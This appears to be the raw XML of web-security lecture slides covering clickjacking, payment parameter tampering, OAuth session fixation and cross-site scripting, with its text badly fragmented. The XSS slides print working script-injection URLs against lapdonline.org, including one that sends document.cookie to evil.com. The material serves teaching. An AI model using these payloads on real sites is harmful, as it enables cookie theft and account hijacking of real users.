            </a:fld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685800" y="1264920"/>
            <a:ext cx="8001000" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Diag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body { display: none; }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pt-BR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(self == top) {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document.getElementsByTagName("body")[0]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.style.display = 'block';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else {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top.location = self.location;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Rydstedt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, Gustav, et al. "Busting frame busting: a study of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> vulnerabilities at popular sites." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>IEEE Oakland Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 2 (2010).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Bent-Up Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866900" y="4800600"/>
            <a:ext cx="5638800" cy="1305580"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 38230"/>
              <a:gd name="adj3" fmla="val 37451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Does this work? Who Knows?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6860" y="5202555"/>
            <a:ext cx="8610600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-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Framebusting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a just a hack.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19351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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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91" y="4368558"/>
            <a:ext cx="64484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228600"/>
            <a:ext cx="8343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X-Frame-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>DENY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	The page cannot be embedded in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>SAMEORIGIN: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The page can only be framed on a page with the same 	domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>ALLOW-FROM origin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The page can only be framed on a page with a specific 	other domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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943600" y="3943350"/>
            <a:ext cx="2819400" cy="2514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Can limit flexibility and might not work on older browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15600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960" y="1828800"/>
            <a:ext cx="6951274" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multi-Party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1042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48" y="3137692"/>
            <a:ext cx="1905372" cy="11090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19309" y="3401533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19309" y="3768098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4859" y="4279839"/>
            <a:ext cx="1219200" cy="1219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734059" y="3402830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4059" y="3768098"/>
            <a:ext cx="80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1278" y="4344994"/>
            <a:ext cx="1102102" cy="11021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3022" y="4383953"/>
            <a:ext cx="1102102" cy="11021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51" y="2871042"/>
            <a:ext cx="1240078" cy="17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6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625323" y="1447800"/>
            <a:ext cx="3930030" cy="1128932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291308"/>
            <a:ext cx="1240078" cy="178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59" y="4508768"/>
            <a:ext cx="1905372" cy="1109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3" y="1291308"/>
            <a:ext cx="1240078" cy="17857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814396" y="3501107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H="1" flipV="1">
            <a:off x="2289284" y="3077020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263530" y="3077020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 flipV="1">
            <a:off x="5713018" y="3539208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3086" y="176882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13085" y="228190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1770" y="636388"/>
            <a:ext cx="12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Party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85558" y="636387"/>
            <a:ext cx="121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Party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4460" y="563768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4626" y="4876800"/>
            <a:ext cx="2971800" cy="1752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Same-origin policy won’t stop parties from communicating directly to share information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84750" y="4876800"/>
            <a:ext cx="2971800" cy="1752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This can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good: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Single Sign-On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Multiparty E-Commerce</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20877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9120" y="1905000"/>
            <a:ext cx="7924800" cy="29718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Disclaimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The exact details of the following protocols may not be 100% correct (i.e. Facebook might use a slightly different implementation than presented here). Our goal is to get a feel for how these systems work.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2162815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Multi-Party E-Commerce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5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8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3101" y="577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96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I’d like the $40 Vest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382" y="4360519"/>
            <a:ext cx="206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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?id=123&amp;total=40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6875" y="3756132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pay?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=123&amp;total=40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my $40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9355" y="46551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28430" y="2057400"/>
            <a:ext cx="359844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10485" y="1665087"/>
            <a:ext cx="25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123 is completed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389736" y="3724642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2465" y="4360519"/>
            <a:ext cx="151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you </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your vest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0113" y="5456893"/>
            <a:ext cx="1102102" cy="11021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66813" y="3974576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$40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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31964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1" grpId="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="27" grpId="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="32" grpId="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="39" grpId="0"/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1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-1" r="2880" b="11204"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="1170467"/>
            <a:ext cx="5146896" cy="210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58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www.lapdonline.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search_results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/search/&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1&amp;chg_filter=1&amp;searchType=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>content_basic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err="1"/>
              <a:t>search_terms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=%3Cscript%3Ealert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);%3C/script%3E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228600" y="1524000"/>
            <a:ext cx="4114800" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59513"/>
              <a:gd name="adj2" fmla="val -5163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&lt;script&gt;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alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie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38300" y="3657600"/>
            <a:ext cx="5867400" cy="6096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Phish with malicious URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4157227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Multi-Party E-Commerce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5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8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3101" y="577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96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I’d like the $40 Vest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382" y="4360519"/>
            <a:ext cx="206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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?id=123&amp;total=40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6875" y="3756132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pay?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=123&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>total=1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46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my $1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9355" y="46551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28430" y="2057400"/>
            <a:ext cx="359844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10485" y="1665087"/>
            <a:ext cx="25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123 is completed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389736" y="3724642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2465" y="4360519"/>
            <a:ext cx="151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you </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your vest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6813" y="3974576"/>
            <a:ext cx="12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$1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0826" y="5458959"/>
            <a:ext cx="1219200" cy="1219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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="833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1" grpId="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="27" grpId="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="32" grpId="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="2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Multi-Party E-Commerce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05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8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3101" y="5777112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96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I’d like the $40 Vest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901" y="4091668"/>
            <a:ext cx="268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Jimmy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590" y="3725150"/>
            <a:ext cx="255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Jimmy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my $40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788" y="4603801"/>
            <a:ext cx="260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jimmy.com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= 40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paid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PayPal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0113" y="5456893"/>
            <a:ext cx="1102102" cy="11021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266813" y="3974576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$40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99261" y="3713257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885" y="4422586"/>
            <a:ext cx="268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PayPal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472758" y="3681510"/>
            <a:ext cx="1279811" cy="13577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58895" y="3593600"/>
            <a:ext cx="240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 checks out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending you your vest.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72758" y="1828800"/>
            <a:ext cx="38124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60282" y="1324423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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37312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  <p:bldP spid="21" grpId="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="27" grpId="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="32" grpId="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="26" grpId="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="41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Multi-Party E-Commerce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69243"/>
            <a:ext cx="1240078" cy="178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648200"/>
            <a:ext cx="1905372" cy="110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567088"/>
            <a:ext cx="1240078" cy="17857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31834" y="5780189"/>
            <a:ext cx="67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898" y="2882850"/>
            <a:ext cx="1359404" cy="46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495" y="2749029"/>
            <a:ext cx="2133600" cy="7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1597644" y="3606278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3032" y="3766933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I’d like the $40 Vest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03534" y="3616695"/>
            <a:ext cx="1577866" cy="158605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901" y="4091668"/>
            <a:ext cx="2687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Jimmy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60052" y="34866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590" y="3725150"/>
            <a:ext cx="2717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</a:t>
            </a:r>
          </a:p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id=123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callback = jimmy.com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Eve’s Store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712452" y="36390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4852" y="37914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85226" y="4299230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my $40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017252" y="3943821"/>
            <a:ext cx="840748" cy="101312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9788" y="4603801"/>
            <a:ext cx="260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 to jimmy.com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= 40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paid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PayPal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6813" y="3974576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$40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99261" y="3713257"/>
            <a:ext cx="1861573" cy="19748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6885" y="4422586"/>
            <a:ext cx="268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paypal.com/pay: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total=40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Signed by PayPal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472758" y="3681510"/>
            <a:ext cx="1279811" cy="13577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58895" y="3593600"/>
            <a:ext cx="240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 checks out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending you your vest.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0826" y="5458959"/>
            <a:ext cx="1219200" cy="1219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54" y="1569243"/>
            <a:ext cx="1240078" cy="178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914" y="2747304"/>
            <a:ext cx="2121417" cy="7333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5064938" y="2447244"/>
            <a:ext cx="148039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0385" y="1414191"/>
            <a:ext cx="1403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makes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>store linked </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to PayPal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078726" y="1981200"/>
            <a:ext cx="14744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60052" y="152884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$40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44" y="6180421"/>
            <a:ext cx="415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Wang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Rui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, et al. "How to shop for free online--Security analysis of cashier-as-a-service based Web stores." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t>Security and Privacy (SP), 2011 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>. IEEE, 2011.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8229" y="1227578"/>
            <a:ext cx="840434" cy="8404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872" y="1211936"/>
            <a:ext cx="633816" cy="63381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35046" y="1298178"/>
            <a:ext cx="633816" cy="6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  <p:bldP spid="21" grpId="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="27" grpId="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="32" grpId="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="26" grpId="1"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="41" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="23" grpId="1"/>
      <p:bldP spid="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Sign-On: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82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84" y="4986288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98" y="1768828"/>
            <a:ext cx="1240078" cy="17857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351819" y="3883829"/>
            <a:ext cx="1350722" cy="12298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228436" y="36727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60686" y="224634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60685" y="275942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944" y="6116340"/>
            <a:ext cx="88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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Facebook Chan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82" y="2909176"/>
            <a:ext cx="783987" cy="8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le:Udacity Logo.sv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2424" y="2863227"/>
            <a:ext cx="1184205" cy="9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54963" y="4103313"/>
            <a:ext cx="184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I’d like to sign in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with Facebook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7168" y="3793745"/>
            <a:ext cx="1114892" cy="10943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5590" y="3404347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Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(include callback URL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and identifier Z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 flipV="1">
            <a:off x="5380836" y="38251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5401" y="3833140"/>
            <a:ext cx="232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Give your permission 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Udacity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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5533236" y="39775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05680" y="4564978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 flipV="1">
            <a:off x="5685636" y="4129922"/>
            <a:ext cx="1219200" cy="114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6440" y="5082684"/>
            <a:ext cx="276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OK. Here’s a special token “X”. Redirect to callback with identifier Z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134526" y="4103862"/>
            <a:ext cx="1221558" cy="1107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5202" y="4813579"/>
            <a:ext cx="219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the token “X” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for user 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98161" y="1794982"/>
            <a:ext cx="349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has token “X”? My secret is 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8014" y="1330218"/>
            <a:ext cx="20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secret: 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27180" y="237203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Alice. She has 5 friends.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2617" y="328522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Z, callback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191" y="1005890"/>
            <a:ext cx="267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linked to Alice’s session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2858" y="1068513"/>
            <a:ext cx="186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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Udacity’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secret is Y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006859" y="1162298"/>
            <a:ext cx="3543139" cy="446371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Z is authenticated as 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70845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OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Security Advisory: 2009.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6305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/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="28" grpId="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="25" grpId="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="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Sign-On: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82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36" y="4996764"/>
            <a:ext cx="1905372" cy="1109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598" y="1768828"/>
            <a:ext cx="1240078" cy="17857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316101" y="3780330"/>
            <a:ext cx="616152" cy="1140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921999" y="3634622"/>
            <a:ext cx="487537" cy="1261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60686" y="224634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60685" y="2759428"/>
            <a:ext cx="3344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1778" y="6105862"/>
            <a:ext cx="88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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2" descr="Facebook Chan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382" y="2909176"/>
            <a:ext cx="783987" cy="8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le:Udacity Logo.sv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2424" y="2863227"/>
            <a:ext cx="1184205" cy="93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4976" y="3889148"/>
            <a:ext cx="1385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I’d like to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sign in with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facebook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95118" y="3652217"/>
            <a:ext cx="621998" cy="1066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13535" y="3826314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Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(include callback URL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and identifier Z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142836" y="3787022"/>
            <a:ext cx="419100" cy="11432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5133" y="3793745"/>
            <a:ext cx="232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Give your permission </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Udacity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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02604" y="3837002"/>
            <a:ext cx="440826" cy="1079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3017" y="4383059"/>
            <a:ext cx="170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Huh? Whatever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05401" y="3951642"/>
            <a:ext cx="424807" cy="10773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57613" y="4736757"/>
            <a:ext cx="1973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OK. Here’s a special token “X”. Redirect to callback with identifier Z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636360" y="3672614"/>
            <a:ext cx="2968171" cy="1424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9608" y="3265392"/>
            <a:ext cx="219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Here’s the token “X” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for user 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98161" y="1794982"/>
            <a:ext cx="349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has token “X”? My secret is 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8014" y="1330218"/>
            <a:ext cx="20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secret: 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27180" y="237203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Alice. She has 5 friends.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2617" y="328522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Z, callback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191" y="1005890"/>
            <a:ext cx="267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linked to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Eve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’s session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2858" y="1068513"/>
            <a:ext cx="186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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Udacity’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secret is Y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006859" y="1162298"/>
            <a:ext cx="3543139" cy="446371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Eve is authenticated as Alice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92" y="4996765"/>
            <a:ext cx="1905372" cy="110909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13535" y="6104786"/>
            <a:ext cx="67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2749" y="5551312"/>
            <a:ext cx="1222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Hey Alice! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check out </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this URL!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08501" y="5475421"/>
            <a:ext cx="16493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0057" y="2794763"/>
            <a:ext cx="8153400" cy="118563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Type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack – Fixed in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" u="sng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6470845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OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Security Advisory: 2009.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25845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4" grpId="1"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="28" grpId="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="25" grpId="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="33" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="4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95F5-8480-4BF7-B7CA-61F41E4B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Adversary!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6B02A-D05A-42B4-A537-8BC4BA8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1825" y="323335"/>
            <a:ext cx="3733800" cy="1555909"/>
          </a:xfrm>
          <a:prstGeom prst="downArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15543"/>
              <a:gd name="adj2" fmla="val 17569"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 649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http://www.lapdonline.org/search_results/search/&amp;view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=‘evil.com/’ +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;%3C/script%3E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538888"/>
            <a:ext cx="1240078" cy="178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14" y="1525390"/>
            <a:ext cx="1905372" cy="1109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346" y="845704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4200" y="951388"/>
            <a:ext cx="1102102" cy="1102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973" y="1525389"/>
            <a:ext cx="1905372" cy="110909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468414" y="2053490"/>
            <a:ext cx="152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35414" y="2786587"/>
            <a:ext cx="0" cy="1600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61" y="4538888"/>
            <a:ext cx="1240078" cy="178571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5754414" y="2862787"/>
            <a:ext cx="0" cy="1524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87414" y="2862787"/>
            <a:ext cx="2088559" cy="1676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7150" y="208583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“Check out this link!”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1345" y="502144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lapdonline.org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31339" y="5086183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8143" y="527084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1345" y="5468653"/>
            <a:ext cx="1102102" cy="11021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79628" y="2524858"/>
            <a:ext cx="2452053" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="left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http://www.lapdonline.org/search_results/search/&amp;view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>;%3C/script%3E</a:t>
            </a:r>
          </a:p>
          <a:p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48586" y="3971288"/>
            <a:ext cx="1408386" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58272"/>
              <a:gd name="adj2" fmla="val -1002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Response containing malicious JS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8729" y="3557060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evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f9geiv33knv141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4165" y="3025741"/>
            <a:ext cx="3378922" cy="408623"/>
          </a:xfrm>
